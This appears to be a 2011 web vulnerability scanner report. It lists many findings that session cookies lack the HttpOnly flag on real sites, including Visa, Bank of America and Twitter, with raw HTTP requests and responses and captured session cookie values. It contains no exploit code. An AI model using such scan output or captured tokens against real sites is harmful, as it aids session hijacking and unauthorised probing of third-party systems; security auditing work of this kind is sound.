<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:19:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/ Connection: close Content-Length: 73954
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]...
guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PracticalMoney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:41 GMT Server: hi Status: 200 OK X-Transaction: 1296684161-47748-46212 ETag: "123020b57eac8841ca216e71073e2ac7" Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT X-Runtime: 0.01070 Content-Type: text/html; charset=utf-8 Content-Length: 50296 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /navyfederalnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:42 GMT Server: hi Status: 200 OK X-Transaction: 1296684162-28021-53593 ETag: "f8784a8a1866b0cf5f586d1676f574b8" Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT X-Runtime: 0.01594 Content-Type: text/html; charset=utf-8 Content-Length: 55640 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cardadvisor/CardAdvisor HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/account-inquiries/card_providers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/discounts/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/security/identity_theft_search.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/student/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/visa_brings_you/mytaxrefund.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/AOLVisaOffers/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/CMS/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/Yahoo/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signaturesouthwest/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /usa_atm/ HTTP/1.1 Host: visa.via.infonow.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29 Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml" Content-Language: en-US Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 29339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=puk5wgcWeyj78GP8+NpaJA**; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visasignature.mobi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Wed, 02 Feb 2011 22:00:41 GMT Server: Apache Set-Cookie: JSESSIONID=puk5wgcWeyj78GP8+NpaJA**; Path=/ Set-Cookie: emvcc=1; Path=/ Location: http://visasignature.mobi/;jsessionid=puk5wgcWeyj78GP8+NpaJA**?emvcc=0 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loginout/login.asp HTTP/1.1 Host: www.1sttools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:54:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 11382 Content-Type: text/html Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RBS_Consumer/SecuredLogin.do HTTP/1.1 Host: www.accessmycardonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:12 GMT Content-type: text/html;charset=iso-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=nyXQNJJQVTn8KD1SsvRkph2vylwYlv0b6WXVqtCWyTfF1WX1dLCL!-1327392406; path=/; secure Cache-Control: no-cache Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /report HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /swfaddress/ HTTP/1.1 Host: www.asual.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:45:32 GMT Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch Set-Cookie: JSESSIONID=13FF2143CAF93EAC84619580631ADA51; Path=/ X-UA-Compatible: IE=8 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12534
<!doctype html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="description" content="Creates open source software and provides profes ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:06 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page Page-Completion-Status: Normal Set-Cookie: CFID=134279852; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=2a1d4a0%2D000380c8%2Dd4d6%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
<!--i2a business unit tracking code--> <script LANGUAGE="JavaScript" type="text/javascript"> var ic_bu = "credit+cards"; </script>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:22 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:21 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132369156; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=17f4331%2D00067587%2Dd4a9%2D1d49%2D9237%2D83a7d3cb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm?page=corp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:18 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=131847850; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=18f90e%2D000aada8%2Dd4a6%2D1d49%2D98e7%2D83689ffb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
<tr valign="top">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /weblinking/?referredby=futurescholar HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:33 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=134279832; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=30739eb%2D0002e311%2Dd4b5%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
